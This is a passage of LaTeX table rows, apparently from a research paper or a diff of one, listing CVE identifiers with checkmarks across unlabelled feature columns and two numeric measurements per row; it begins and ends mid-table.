14.57\\ \midrule +CVE-2013-4111 & & & & & \checkmark & & & \checkmark & \checkmark & \checkmark & \checkmark & & & & & & & 17.94 & 5.04\\ \midrule +CVE-2013-4116 & & & \checkmark & \checkmark & \checkmark & & & & & & \checkmark & & \checkmark & & \checkmark & & & 13.95 & 0.16\\ \midrule +CVE-2013-4316 & & & & & \checkmark & & & & & \checkmark & & & & & & & & 21.61 & 18.05\\ \midrule +CVE-2013-4413 & & & & \checkmark & \checkmark & & \checkmark & & & \checkmark & \checkmark & \checkmark & & & \checkmark & & & 1.6 & 0.15\\ \midrule +CVE-2013-4562 & & & & \checkmark & \checkmark & & & & \checkmark & & \checkmark & & & & & & & 1.7 & 0.15\\ \midrule +CVE-2013-4701 & & & & \checkmark & \checkmark & & & \checkmark & \checkmark & \checkmark & \checkmark & & & & & & & 3.71 & 0.05\\ \midrule +CVE-2013-6465 & & & & \checkmark & \checkmark & & \checkmark & \checkmark & & \checkmark & \checkmark & & & & & & \checkmark & 2.67 & 0.17\\ \midrule +CVE-2013-7378 & & & & \checkmark & \checkmark & & \checkmark & \checkmark & \checkmark & & \checkmark & & & & & & & 1.62 & 0.16\\ \midrule +CVE-2013-7459 & & & & \checkmark & \checkmark & & & \checkmark & & & \checkmark & & & & & & & 8.92 & 0.15\\ \midrule +CVE-2014-0072 & & & & \checkmark & \checkmark & & \checkmark & \checkmark & \checkmark & & \checkmark & & & & & & & 2.48 & 0.23\\ \midrule +CVE-2014-0073 & & & & \checkmark & \checkmark & & \checkmark & & & \checkmark & \checkmark & & & & & & & 2.1 & 0.24\\ \midrule +CVE-2014-0120 & & & & \checkmark & \checkmark & & \checkmark & \checkmark & & \checkmark & \checkmark & & & & & & & 2.14 & 0.18\\ \midrule +CVE-2014-0121 & & & & \checkmark & \checkmark & & \checkmark & \checkmark & & \checkmark & \checkmark & \checkmark & & & & & & 2.34 & 0.18\\ \midrule +CVE-2014-0160 & \checkmark & & & \checkmark & \checkmark & & \checkmark & \checkmark & \checkmark & & \checkmark & \checkmark & & & & & & 57.04 & 25.44\\ \midrule +CVE-2014-0177 & \checkmark & & & \checkmark & \checkmark & & \checkmark & & & & \checkmark & & & & & & & 1.58 & 0.16\\ \midrule +CVE-2014-1202 & & & & \checkmark & & & \checkmark & \checkmark & \checkmark & \checkmark & \checkmark & & & & & & & 2.69 & 0.16\\ \midrule +CVE-2014-1403 & \checkmark & & & \checkmark & \checkmark & & \checkmark & \checkmark & & \checkmark & & & & & & & & 1.86 & 0.05\\ \midrule +CVE-2014-1604 & & & & \checkmark & \checkmark & & \checkmark & & & \checkmark & \checkmark & & & & & & & 4.37 & 0.21\\ \midrule +CVE-2014-1904 & & & & \checkmark & \checkmark & & \checkmark & \checkmark & \checkmark & \checkmark & \checkmark & & & & & & & 2.6 & 0.16\\ \midrule +CVE-2014-2525 & & & & & \checkmark & & & \checkmark & \checkmark & & \checkmark & \checkmark & & & & & & 9.24 & 4.45\\ \midrule +CVE-2014-3250 & & & & & \checkmark & & & \checkmark & \checkmark & \checkmark & \checkmark & & & & & & & 18.81 & 16.43\\ \midrule +CVE-2014-3488 & & & & \checkmark & \checkmark & & \checkmark & \checkmark & \checkmark & \checkmark & \checkmark & & & & & & & 17.29 & 0.31\\ \midrule +CVE-2014-3576 & & & & & \checkmark & & \checkmark & \checkmark & & \checkmark & & & & & & & & 17.11 & 0.34\\ \midrule +CVE-2014-3579 & & \checkmark & & \checkmark & \checkmark & \checkmark & \checkmark & & & \checkmark & \checkmark & & & & & \checkmark & & 2.4 & 0.03\\ \midrule +CVE-2014-3599 & & & & \checkmark & & & & & & & \checkmark & & & & \checkmark & & & 4.52 & 0.18\\ \midrule +CVE-2014-3612 & & & & & \checkmark & \checkmark & \checkmark & \checkmark & & \checkmark & & & & & & \checkmark & \checkmark & 27.11 & 24.09\\ \midrule +CVE-2014-3741 & & & & \checkmark & \checkmark & & \checkmark & \checkmark & & & \checkmark & \checkmark & & & & & & 1.41 & 0.03\\ \midrule +CVE-2014-3995 & & & & \checkmark & \checkmark & & \checkmark & \checkmark & \checkmark & \checkmark & \checkmark & \checkmark & & & & & \checkmark & 2.23 & 0.17\\ \midrule +CVE-2014-4657 & & & & \checkmark & \checkmark & & & \checkmark & \checkmark & & & & & & & & \checkmark & 12.29 & 10.18\\ \midrule +CVE-2014-5277 & & & & & & & & & & \checkmark & & & & & & & & 21.94 & 18.45\\ \midrule +CVE-2014-6394 & & & \checkmark & \checkmark & \checkmark & & & & & & \checkmark & & & & \checkmark & & & 25.46 & 14.68\\ \midrule +CVE-2014-7143 & & & & & & & & \checkmark & & \checkmark & & & & & & & & 24.52 & 21.97\\ \midrule +CVE-2014-7189 & & & & & & & & \checkmark & \checkmark & & \checkmark & \checkmark & & & & & & 24.35 & 20.83\\ \midrule +CVE-2014-7192 & & & & \checkmark & \checkmark & & \checkmark & \checkmark & & & \checkmark & \checkmark & & & & & & 1.44 & 0.08\\ \midrule +CVE-2014-7193 & & & & \checkmark & \checkmark & & & & & & \checkmark & \checkmark & & & \checkmark & & & 1.66 & 0.18\\ \midrule +CVE-2014-7809 & & & & & \checkmark & & & & & & & & & & & & & 2.85 & 0.11\\ \midrule +CVE-2014-8115 & & & & \checkmark & & & & \checkmark & & & \checkmark & \checkmark & & & & & & 3.38 & 0.18\\ \midrule +CVE-2014-8152 & \checkmark & & & & \checkmark & & & \checkmark & & & \checkmark & & & & & & & 9.24 & 6.5\\ \midrule +CVE-2014-8681 & & & & \checkmark & \checkmark & & \checkmark & \checkmark & & \checkmark & & & & & & & & 1.77 & 0.16\\ \midrule +CVE-2014-8682 & & & & \checkmark & \checkmark & & \checkmark & \checkmark & \checkmark & \checkmark & & & & & & & & 1.72 & 0.17\\ \midrule +CVE-2014-9130 & & & & \checkmark & \checkmark & & \checkmark & & \checkmark & & \checkmark & & & & & & & 2.52 & 0.05\\ \midrule +CVE-2014-9489 & & & & \checkmark & \checkmark & & & \checkmark & & & & \checkmark & & & & & & 2.67 & 0.09\\ \midrule +CVE-2014-9682 & & & & \checkmark & \checkmark & & \checkmark & \checkmark & & & & & & & & & & 2.41 & 0.02\\ \midrule +CVE-2014-9721 & & & \checkmark & \checkmark & \checkmark & & & & & & \checkmark & \checkmark & & & \checkmark & & & 7.68 & 0.03\\ \midrule +CVE-2014-9970 & & & & & \checkmark & & & & & & \checkmark & & & & & & & 31.47 & 26.7\\ \midrule +CVE-2015-0250 & & & & & & & & \checkmark & & & & & & & & & & 24.93 & 18.37\\ \midrule +CVE-2015-0276 & \checkmark & & & & \checkmark & & & \checkmark & \checkmark & & \checkmark & & & & & & & 28.58 & 26.71\\ \midrule +CVE-2015-0838 & \checkmark & & & & \checkmark & & \checkmark & \checkmark & & \checkmark & \checkmark & \checkmark & & & & & & 2.98 & 0.02\\ \midrule +CVE-2015-0846 & & & & \checkmark & \checkmark & & & \checkmark & & & \checkmark & & & & & & & 1.99 & 0.17\\ \midrule +CVE-2015-1326 & \checkmark & & & \checkmark & \checkmark & & & \checkmark & & & \checkmark & \checkmark & & & \checkmark & & & 2.57 & 0.17\\ \midrule +CVE-2015-1772 & & & & & \checkmark & & \checkmark & \checkmark & \checkmark & \checkmark & \checkmark & \checkmark & & \checkmark & & \checkmark & & 23.19 & 17.26\\ \midrule +CVE-2015-1782 & \checkmark & & & & \checkmark & & & \checkmark & & & \checkmark & & & & & & & 18.35 & 12.59\\ \midrule +CVE-2015-1838 & & & & \checkmark & & & \checkmark & & \checkmark & \checkmark & & & & & & & \checkmark & 12.22 & 0.17\\ \midrule +CVE-2015-3206 & & & & \checkmark & \checkmark & & & \checkmark & \checkmark & & & & & & & & & 14.52 & 0.07\\ \midrule +CVE-2015-3220 & & & & \checkmark & \checkmark & & & & & & & & & & & & & 12.76 & 0.16\\ \midrule +CVE-2015-3627 & & & & & & & & & & & \checkmark & & & & & & & 2.87 & 0.17\\ \midrule +CVE-2015-4082 & & & \checkmark & \checkmark & \checkmark & & & & & & \checkmark & & & & \checkmark & & & 2.17 & 0.13\\ \midrule +CVE-2015-4410 & & & & \checkmark & & & & \checkmark & & & & & & & & & & 12.23 & 9.38\\ \midrule +CVE-2015-4412 & & & & \checkmark & \checkmark & & \checkmark & \checkmark & & & & & & & & & & 15.03 & 12.49\\ \midrule +CVE-2015-4619 & & & & \checkmark & \checkmark & & & & & \checkmark & \checkmark & & & & & & & 17.49 & 16.07\\ \midrule +CVE-2015-5081 & & & & \checkmark & \checkmark & & & & & & \checkmark & & & & \checkmark & & & 3.2 & 0.17\\ \midrule +CVE-2015-5147 & & & & \checkmark & & & & & & & & & & & & & & 14.0 & 11.59\\ \midrule +CVE-2015-6524 & & & & & \checkmark & & \checkmark & \checkmark & & \checkmark & & & & & & \checkmark & \checkmark & 7.44 & 2.58\\ \midrule +CVE-2015-6584 & & & & \checkmark & \checkmark & & \checkmark & & \checkmark & \checkmark & \checkmark & \checkmark & & & & & & 1.84 & 0.15\\ \midrule +CVE-2015-7294 & & & \checkmark & \checkmark & \checkmark & & \checkmark & & \checkmark & & & \checkmark & & & \checkmark & & & 2.7 & 0.03\\ \midrule +CVE-2015-7337 & & & & \checkmark & & & & & & & \checkmark & & & & & & & 3.09 & 0.17\\ \midrule +CVE-2015-7541 & \checkmark & & & \checkmark & \checkmark & & \checkmark & \checkmark & & \checkmark & \checkmark & & & & & & & 1.48 & 0.05\\ \midrule +CVE-2015-7809 & & & & \checkmark & \checkmark & & \checkmark & \checkmark & & \checkmark & \checkmark & \checkmark & & & & & & 3.37 & 0.16\\ \midrule +CVE-2015-8309 & \checkmark & & & \checkmark & \checkmark & & & & & & \checkmark & \checkmark & & & & & & 2.68 & 0.2\\ \midrule +CVE-2015-8310 & & & & \checkmark & \checkmark & & & & & \checkmark & \checkmark & \checkmark & & & & & & 2.26 & 0.27\\ \midrule +CVE-2015-8747 & & & & \checkmark & \checkmark & & & & & \checkmark & \checkmark & & & & & & & 5.4 & 0.16\\ \midrule +CVE-2015-8814 & & & & \checkmark & \checkmark & & & \checkmark & & \checkmark & \checkmark & & & & & & & 41.76 & 0.17\\ \midrule +CVE-2015-8854 & & & \checkmark & & \checkmark & & & & & & \checkmark & & \checkmark & & \checkmark & & & 23.38 & 17.27\\ \midrule +CVE-2015-8862 & & & & & \checkmark & & & & & & \checkmark & \checkmark & & & & & & 26.24 & 24.36\\ \midrule +CVE-2015-9235 & & & & \checkmark & \checkmark & & & & & & \checkmark & \checkmark & & & & & & 2.81 & 0.17\\ \midrule +CVE-2015-9241 & & & & \checkmark & & & & & & & \checkmark & & & & \checkmark & & & 2.19 & 0.17\\ \midrule +CVE-2016-0750 & & & & \checkmark & & & & & & \checkmark & \checkmark & & & & & & & 6.34 & 0.16\\ \midrule +CVE-2016-1505 & & & & \checkmark & \checkmark & & & & & \checkmark & \checkmark & & & & & & & 2.96 & 0.16\\ \midrule +CVE-2016-2166 & & \checkmark & & \checkmark & \checkmark & & \checkmark & \checkmark & \checkmark & & \checkmark & & & \checkmark & & \checkmark & & 5.46 & 0.22\\ \midrule +CVE-2016-2537 & & & & \checkmark & \checkmark & & & \checkmark & & & \checkmark & \checkmark & & & & & & 17.85 & 0.03\\ \midrule +CVE-2016-3114 & \checkmark & & & & \checkmark & & & & & \checkmark & \checkmark & \checkmark & & & & & & 11.42 & 4.52\\ \midrule +CVE-2016-3693 & & & & \checkmark & \checkmark & & & & & & \checkmark & & & & & & & 5.37 & 0.03\\ \midrule +CVE-2016-3720 & & & \checkmark & \checkmark & \checkmark & & & \checkmark & & & & & \checkmark & & \checkmark & & & 4.29 & 0.19\\ \midrule +CVE-2016-4000 & & & & & \checkmark & & \checkmark & \checkmark & \checkmark & \checkmark & \checkmark & & & & \checkmark & & & 36.15 & 29.29\\ \midrule +CVE-2016-4442 & & & & \checkmark & & & & & & & \checkmark & \checkmark & & & & & & 1.82 & 0.04\\ \midrule +CVE-2016-4562 & & & & \checkmark & \checkmark & & \checkmark & \checkmark & & \checkmark & \checkmark & & & & & & & 2.18 & 0.19\\ \midrule +CVE-2016-4563 & & & & \checkmark & \checkmark & & \checkmark & \checkmark & & \checkmark & \checkmark & & & & & & & 2.81 & 0.53\\ \midrule +CVE-2016-4564 & & & & \checkmark & \checkmark & & \checkmark & \checkmark & & \checkmark & \checkmark & & & & & & & 2.48 & 0.18\\ \midrule +CVE-2016-4974 & \checkmark & & & & \checkmark & \checkmark & \checkmark & \checkmark & \checkmark & \checkmark & \checkmark & & & & & \checkmark & & 3.94 & 0.17\\ \midrule +CVE-2016-4977 & & & & & \checkmark & & \checkmark & & \checkmark & \checkmark & \checkmark & \checkmark & & & & & & 32.16 & 27.23\\ \midrule +CVE-2016-5007 & & & \checkmark & & & & & \checkmark & & \checkmark & \checkmark & & & & \checkmark & & & 4.8 & 0.17\\ \midrule +CVE-2016-5104 & & & & \checkmark & \checkmark & & \checkmark & \checkmark & & \checkmark & \checkmark & & & & & & & 3.91 & 0.04\\ \midrule +CVE-2016-5180 & \checkmark & & & & \checkmark & & \checkmark & \checkmark & & & \checkmark & & & & & & & 26.76 & 24.35\\ \midrule +CVE-2016-5431 & & & & \checkmark & \checkmark & & \checkmark & \checkmark & & & & \checkmark & & & & & & 1.55 & 0.15\\ \midrule +CVE-2016-5697 & & & & \checkmark & \checkmark & & & \checkmark & & & \checkmark & \checkmark & & & & & & 1.6 & 0.03\\ \midrule +CVE-2016-5841 & & & & \checkmark & \checkmark & & \checkmark & \checkmark & \checkmark & \checkmark & \checkmark & & & & & & & 3.07 & 0.17\\ \midrule +CVE-2016-5842 & & & & \checkmark & \checkmark & & \checkmark & & & \checkmark & & & & & & & & 2.83 & 0.17\\ \midrule +CVE-2016-5851 & & & & \checkmark & \checkmark & & & \checkmark & \checkmark & & \checkmark & \checkmark & & & & & & 7.13 & 0.12\\ \midrule +CVE-2016-6298 & \checkmark & & \checkmark & \checkmark & \checkmark & \checkmark & & \checkmark & \checkmark & & \checkmark & \checkmark & & & \checkmark & & \checkmark & 3.53 & 0.18\\ \midrule +CVE-2016-7528 & & & & \checkmark & \checkmark & & \checkmark & \checkmark & & \checkmark & \checkmark & & & & & & \checkmark & 2.99 & 0.19\\ \midrule +CVE-2016-8738 & & & & & \checkmark & & \checkmark & \checkmark & & \checkmark & & & & & & & & 24.34 & 21.03\\ \midrule +CVE-2016-9298 & & & & \checkmark & & & & \checkmark & & \checkmark & \checkmark & & & & & & \checkmark & 3.66 & 0.16\\ \midrule +CVE-2016-9909 & & & \checkmark & \checkmark & \checkmark & & & & \checkmark & \checkmark & \checkmark & \checkmark & & & \checkmark & & & 4.12 & 0.23\\ \midrule +CVE-2016-9910 & & & \checkmark & \checkmark & \checkmark & & & & \checkmark & \checkmark & \checkmark & \checkmark & & & \checkmark & & & 2.7 & 0.18\\ \midrule +CVE-2016-9962 & & & & & & & & & & \checkmark & \checkmark & & & & & & & 11.3 & 0.17\\ \midrule +CVE-2016-10100 & & & & & & & & & & \checkmark & \checkmark & & & & & & & 23.68 & 20.86\\ \midrule +CVE-2016-10149 & & & \checkmark & \checkmark & \checkmark & & \checkmark & \checkmark & \checkmark & & & \checkmark & \checkmark & & \checkmark & & & 3.85 & 0.14\\ \midrule +CVE-2016-10173 & \checkmark & & \checkmark & & \checkmark & \checkmark & \checkmark & \checkmark & & \checkmark & \checkmark & \checkmark & \checkmark & & \checkmark & & & 3.03 & 0.17\\ \midrule +CVE-2016-10345 & & & & \checkmark & \checkmark & & \checkmark & & \checkmark & \checkmark & \checkmark & & & & & & & 3.36 & 0.16\\ \midrule +CVE-2016-10522 & & & & \checkmark & \checkmark & & & \checkmark & \checkmark & \checkmark & \checkmark & & & & & & & 4.81 & 2.4\\ \midrule +CVE-2016-10524 & & & & \checkmark & \checkmark & & & & & & \checkmark & & & & & & & 1.66 & 0.06\\ \midrule +CVE-2016-10528 & & & & & \checkmark & & & & & & \checkmark & & & & & & & 8.81 & 7.1\\ \midrule +CVE-2016-10529 & & & & & \checkmark & & & & & & \checkmark & \checkmark & & & & & & 13.92 & 12.33\\ \midrule +CVE-2016-10531 & & & & \checkmark & \checkmark & & \checkmark & \checkmark & \checkmark & \checkmark & \checkmark & \checkmark & & & & & & 3.64 & 0.17\\ \midrule +CVE-2016-10536 & & & & \checkmark & \checkmark & & \checkmark & \checkmark & & & \checkmark & & & & & & & 1.53 & 0.02\\ \midrule +CVE-2016-10540 & & & & \checkmark & \checkmark & & \checkmark & \checkmark & & \checkmark & \checkmark & & & & & & & 1.64 & 0.03\\ \midrule +CVE-2016-10543 & & & & & & & & & & & & & & & & & & 13.57 & 11.58\\ \midrule +CVE-2016-10544 & & & & \checkmark & \checkmark & & \checkmark & \checkmark & & \checkmark & \checkmark & & & & & & & 16.43 & 14.95\\ \midrule +CVE-2016-10554 & & & & \checkmark & \checkmark & & & \checkmark & \checkmark & & \checkmark & \checkmark & & & & & & 1.93 & 0.31\\ \midrule +CVE-2016-10556 & & & & \checkmark & \checkmark & & & \checkmark & & \checkmark & \checkmark & & & & & & & 2.78 & 0.17\\ \midrule +CVE-2016-10558 & & & & & \checkmark & & & & & & \checkmark & \checkmark & & & \checkmark & & & 24.55 & 23.07\\ \midrule +CVE-2016-10559 & & & & & \checkmark & & & & & \checkmark & & & & & & & & 10.29 & 8.81\\ \midrule +CVE-2016-10560 & & & & & \checkmark & & & & & & & & & & \checkmark & & & 25.3 & 23.8\\ \midrule +CVE-2016-10564 & & & & & & & & & & & & & & & & & & 10.45 & 9.01\\ \midrule +CVE-2016-10569 & & & & & & & & & & & & & & & & & & 15.46 & 14.07\\ \midrule +CVE-2016-10574 & & & & & & & & \checkmark & & & & & & & & & & 21.36 & 19.66\\ \midrule +CVE-2016-10575 & & & & & \checkmark & & & & & & \checkmark & & & & & & & 26.95 & 25.28\\ \midrule +CVE-2016-10577 & & & & \checkmark & \checkmark & & & \checkmark & & & & & & & \checkmark & & & 1.51 & 0.11\\ \midrule +CVE-2016-10591 & & & & & \checkmark & & & & & & & & & & \checkmark & & & 4.14 & 2.66\\ \midrule +CVE-2016-10611 & & & & & \checkmark & & & & & & \checkmark & & & & & & & 17.29 & 15.65\\ \midrule +CVE-2016-10694 & & & & & \checkmark & & & & & \checkmark & & & & & & & & 11.64 & 8.99\\ \midrule +CVE-2016-10703 & & & & \checkmark & \checkmark & & \checkmark & \checkmark & & & & \checkmark & & & & & & 1.62 & 0.18\\ \midrule +CVE-2016-10735 & & & & & \checkmark & & & \checkmark & \checkmark & & \checkmark & \checkmark & & & & & & 16.56 & 0.76\\ \midrule +CVE-2016-1000236 & & & & \checkmark & & & & & & & & & & & & & & 3.51 & 0.08\\ \midrule +CVE-2016-1000338 & & & & \checkmark & \checkmark & & & \checkmark & \checkmark & \checkmark & \checkmark & & & & & & \checkmark & 3.98 & 0.16\\ \midrule +CVE-2016-1000340 & & & & \checkmark & \checkmark & & & \checkmark & & \checkmark & \checkmark & & & & & & \checkmark & 3.24 & 0.51\\ \midrule +CVE-2016-1000343 & & & & \checkmark & \checkmark & & & \checkmark & \checkmark & \checkmark & \checkmark & & & & & & \checkmark & 2.78 & 0.17\\ \midrule +CVE-2016-1000344 & & & & \checkmark & \checkmark & & & \checkmark & & \checkmark & \checkmark & & & & & & \checkmark & 2.61 & 0.17\\ \midrule +CVE-2017-0904 & & & & \checkmark & \checkmark & & & \checkmark & \checkmark & & \checkmark & & & & & & & 1.96 & 0.12\\ \midrule +CVE-2017-2617 & & & & & \checkmark & & & & & \checkmark & \checkmark & & & & & & & 28.86 & 26.14\\ \midrule +CVE-2017-2638 & & & & & & & \checkmark & \checkmark & \checkmark & \checkmark & \checkmark & & & & & & & 33.5 & 15.82\\ \midrule +CVE-2017-2652 & & & & & \checkmark & & & & & & & & & & & & & 17.97 & 12.85\\ \midrule +CVE-2017-2667 & & & & & \checkmark & & & \checkmark & & \checkmark & \checkmark & & & & \checkmark & & & 24.28 & 22.08\\ \midrule +CVE-2017-2809 & & & \checkmark & \checkmark & \checkmark & & & & & & \checkmark & \checkmark & & & \checkmark & & & 2.64 & 0.02\\ \midrule +CVE-2017-3204 & & & & \checkmark & \checkmark & & & \checkmark & \checkmark & & \checkmark & \checkmark & & & \checkmark & & & 3.82 & 0.16\\ \midrule +CVE-2017-4973 & & & & & \checkmark & & & \checkmark & & \checkmark & \checkmark & & & & \checkmark & & & 28.63 & 26.95\\ \midrule +CVE-2017-5209 & & & & \checkmark & \checkmark & & \checkmark & \checkmark & & & \checkmark & & & & & & & 2.67 & 0.22\\ \midrule +CVE-2017-5545 & & & \checkmark & \checkmark & \checkmark & & \checkmark & & \checkmark & & \checkmark & & & & \checkmark & & & 3.03 & 0.18\\ \midrule +CVE-2017-5591 & & & & \checkmark & \checkmark & & \checkmark & & & \checkmark & \checkmark & & & & & & & 2.04 & 0.07\\ \midrule +CVE-2017-5641 & & & & & \checkmark & & & \checkmark & \checkmark & \checkmark & \checkmark & & & & & & & 13.59 & 11.09\\ \midrule +CVE-2017-5645 & & & & \checkmark & \checkmark & & & & & \checkmark & \checkmark & & & & & & & 33.72 & 0.17\\ \midrule +CVE-2017-5858 & & & & & \checkmark & & \checkmark & \checkmark & & & \checkmark & & & & & & \checkmark & 24.26 & 21.74\\ \midrule +CVE-2017-5934 & \checkmark & & & \checkmark & \checkmark & & \checkmark & & \checkmark & \checkmark & \checkmark & \checkmark & & & & & & 5.24 & 0.56\\ \midrule +CVE-2017-5936 & & & & \checkmark & \checkmark & & & \checkmark & & & \checkmark & & & & & & & 1.62 & 0.11\\ \midrule +CVE-2017-5946 & & & \checkmark & \checkmark & \checkmark & \checkmark & & & & & \checkmark & \checkmark & \checkmark & & \checkmark & & & 4.99 & 0.31\\ \midrule +CVE-2017-7540 & & & \checkmark & \checkmark & \checkmark & & & & & & & & & & \checkmark & & & 2.43 & 0.05\\ \midrule +CVE-2017-7654 & & & & \checkmark & \checkmark & & \checkmark & & \checkmark & & \checkmark & \checkmark & & & \checkmark & & & 3.98 & 0.17\\ \midrule +CVE-2017-7656 & & & & \checkmark & \checkmark & & & \checkmark & \checkmark & \checkmark & \checkmark & & & & \checkmark & & & 4.29 & 0.16\\ \midrule +CVE-2017-8028 & & & \checkmark & \checkmark & \checkmark & \checkmark & \checkmark & \checkmark & \checkmark & \checkmark & \checkmark & & & & \checkmark & & & 3.81 & 0.17\\ \midrule +CVE-2017-8418 & & & \checkmark & \checkmark & \checkmark & & & & \checkmark & & \checkmark & \checkmark & \checkmark & & \checkmark & & & 3.38 & 0.32\\ \midrule +CVE-2017-8932 & & & \checkmark & \checkmark & \checkmark & & & \checkmark & & \checkmark & \checkmark & & \checkmark & & \checkmark & & & 23.38 & 0.19\\ \midrule +CVE-2017-9796 & & & & & \checkmark & & & \checkmark & \checkmark & \checkmark & \checkmark & \checkmark & & \checkmark & \checkmark & \checkmark & & 32.87 & 23.7\\ \midrule +CVE-2017-11173 & & & & \checkmark & \checkmark & & \checkmark & \checkmark & & & \checkmark & & & & \checkmark & & & 3.01 & 0.07\\ \midrule +CVE-2017-11427 & \checkmark & & & & \checkmark & & \checkmark & & & \checkmark & & \checkmark & & & & & & 24.08 & 22.63\\ \midrule +CVE-2017-11467 & & & & & \checkmark & & & & & \checkmark & \checkmark & \checkmark & & & & & & 24.43 & 22.08\\ \midrule +CVE-2017-11905 & \checkmark & & & & \checkmark & & & & & & & & & & & & & 20.24 & 16.39\\ \midrule +CVE-2017-11910 & \checkmark & & & & \checkmark & & & & & & & & & & & & & 20.2 & 16.52\\ \midrule +CVE-2017-12098 & & & \checkmark & \checkmark & \checkmark & & & & \checkmark & \checkmark & \checkmark & \checkmark & & & \checkmark & & & 2.37 & 0.16\\ \midrule +CVE-2017-12616 & & & & & \checkmark & & \checkmark & \checkmark & & \checkmark & & & & & & & & 16.08 & 11.16\\ \midrule +CVE-2017-12620 & & & & & \checkmark & & & \checkmark & \checkmark & & & & & & & \checkmark & & 24.18 & 22.14\\ \midrule +CVE-2017-12622 & & & & & & & \checkmark & \checkmark & & \checkmark & & & & & \checkmark & \checkmark & & 13.11 & 2.83\\ \midrule +CVE-2017-12867 & & & & \checkmark & \checkmark & & & & & \checkmark & \checkmark & \checkmark & & & & & \checkmark & 2.92 & 0.17\\ \midrule +CVE-2017-12871 & & & & \checkmark & \checkmark & & \checkmark & \checkmark & & \checkmark & \checkmark & & & & & & \checkmark & 2.19 & 0.16\\ \midrule +CVE-2017-13098 & & & & \checkmark & \checkmark & & \checkmark & & & \checkmark & & & & & & & \checkmark & 3.43 & 0.16\\ \midrule +CVE-2017-14619 & & & & \checkmark & \checkmark & & \checkmark & \checkmark & \checkmark & \checkmark & & \checkmark & & & & & & 1.63 & 0.03\\ \midrule +CVE-2017-14735 & & & \checkmark & \checkmark & \checkmark & & \checkmark & \checkmark & & \checkmark & \checkmark & & & & \checkmark & & & 2.22 & 0.02\\ \midrule +CVE-2017-15051 & & & & \checkmark & \checkmark & & & \checkmark & & \checkmark & & & & & & & & 2.2 & 0.31\\ \midrule +CVE-2017-15052 & & & & \checkmark & & & \checkmark & \checkmark & & \checkmark & \checkmark & & & & & & & 2.09 & 0.28\\ \midrule +CVE-2017-15053 & & & & \checkmark & & & \checkmark & & & \checkmark & \checkmark & & & & & & & 2.07 & 0.33\\ \midrule +CVE-2017-15054 & & & & \checkmark & \checkmark & & \checkmark & \checkmark & \checkmark & \checkmark & \checkmark & \checkmark & & & & & & 2.1 & 0.36\\ \midrule +CVE-2017-15055 & & & & \checkmark & \checkmark & & \checkmark & \checkmark & & \checkmark & & & & & & & & 1.98 & 0.23\\ \midrule +CVE-2017-15133 & \checkmark & & \checkmark & \checkmark & \checkmark & & & \checkmark & \checkmark & \checkmark & \checkmark & \checkmark & & & \checkmark & & & 3.35 & 0.15\\ \midrule +CVE-2017-15278 & & & & \checkmark & \checkmark & & \checkmark & \checkmark & & & & & & & & & & 2.59 & 0.17\\ \midrule +CVE-2017-15703 & & \checkmark & \checkmark & & & & & & & \checkmark & \checkmark & \checkmark & & \checkmark & \checkmark & \checkmark & & 22.63 & 17.75\\ \midrule +CVE-2017-15728 & & & & \checkmark & \checkmark & & \checkmark & \checkmark & \checkmark & & & \checkmark & & & & & & 1.67 & 0.17\\ \midrule +CVE-2017-15729 & & & & \checkmark & \checkmark & & \checkmark & \checkmark & \checkmark & \checkmark & \checkmark & & & & & & \checkmark & 2.82 & 0.29\\ \midrule +CVE-2017-15730 & & & & \checkmark & \checkmark & & \checkmark & \checkmark & & \checkmark & & & & & & & & 1.99 & 0.25\\ \midrule +CVE-2017-15731 & & & & \checkmark & \checkmark & & \checkmark & \checkmark & \checkmark & \checkmark & \checkmark & & & & & & \checkmark & 1.88 & 0.31\\ \midrule +CVE-2017-15733 & & & & \checkmark & \checkmark & & \checkmark & \checkmark & \checkmark & \checkmark & \checkmark & & & & & & \checkmark & 1.88 & 0.17\\ \midrule +CVE-2017-15734 & & & & \checkmark & \checkmark & & \checkmark & & \checkmark & \checkmark & \checkmark & & & & & & \checkmark & 2.19 & 0.25\\ \midrule +CVE-2017-15735 & & & & \checkmark & \checkmark & & \checkmark & \checkmark & \checkmark & \checkmark & \checkmark & & & & & & \checkmark & 2.25 & 0.28\\ \midrule +CVE-2017-15808 & & & & \checkmark & \checkmark & & \checkmark & \checkmark & \checkmark & \checkmark & \checkmark & & & & & & \checkmark & 1.7 & 0.19\\ \midrule +CVE-2017-15809 & & & & \checkmark & \checkmark & & \checkmark & & \checkmark & \checkmark & & \checkmark & & & & & & 1.66 & 0.17\\ \midrule +CVE-2017-15879 & & & \checkmark & \checkmark & & & & & & & & & & & \checkmark & & & 3.56 & 0.17\\ \midrule +CVE-2017-15928 & & & & \checkmark & \checkmark & & & & & & \checkmark & & & & & & & 2.46 & 0.08\\ \midrule +CVE-2017-16003 & & & & \checkmark & \checkmark & & & & & & & & & & & & & 1.61 & 0.17\\ \midrule +CVE-2017-16007 & & & & & \checkmark & & & \checkmark & & \checkmark & \checkmark & & & & \checkmark & & & 10.64 & 8.26\\ \midrule +CVE-2017-16008 & & & & \checkmark & \checkmark & & & & & \checkmark & \checkmark & \checkmark & & & & & & 2.79 & 0.24\\ \midrule +CVE-2017-16013 & & & \checkmark & \checkmark & \checkmark & & & \checkmark & \checkmark & & \checkmark & & \checkmark & & \checkmark & & & 2.06 & 0.03\\ \midrule +CVE-2017-16014 & & & & \checkmark & \checkmark & & \checkmark & & & & & \checkmark & & & & & \checkmark & 7.74 & 4.74\\ \midrule +CVE-2017-16015 & & & & \checkmark & \checkmark & & & \checkmark & & & \checkmark & & & & & & & 1.87 & 0.13\\ \midrule +CVE-2017-16016 & & & & \checkmark & \checkmark & & & \checkmark & \checkmark & & \checkmark & \checkmark & & & & & & 2.26 & 0.07\\ \midrule +CVE-2017-16017 & & & & \checkmark & \checkmark & & & & & & & & & & & & & 23.42 & 20.6\\ \midrule +CVE-2017-16023 & & & \checkmark & \checkmark & & & & & & & \checkmark & & & & \checkmark & & & 22.88 & 20.45\\ \midrule +CVE-2017-16025 & & & \checkmark & \checkmark & \checkmark & & & & & & \checkmark & & & & \checkmark & & & 8.72 & 6.89\\ \midrule +CVE-2017-16042 & & & \checkmark & \checkmark & \checkmark & & & & & & \checkmark & \checkmark & \checkmark & & \checkmark & & & 3.6 & 0.18\\ \midrule +CVE-2017-16136 & & & & \checkmark & & & & & & & \checkmark & & & & & & & 1.85 & 0.15\\ \midrule +CVE-2017-16228 & & & & \checkmark & \checkmark & & & \checkmark & \checkmark & & \checkmark & & & & & & & 6.06 & 0.16\\ \midrule +CVE-2017-16244 & & & & \checkmark & \checkmark & & & \checkmark & \checkmark & & \checkmark & & & & & & & 1.97 & 0.46\\ \midrule +CVE-2017-16613 & \checkmark & & & \checkmark 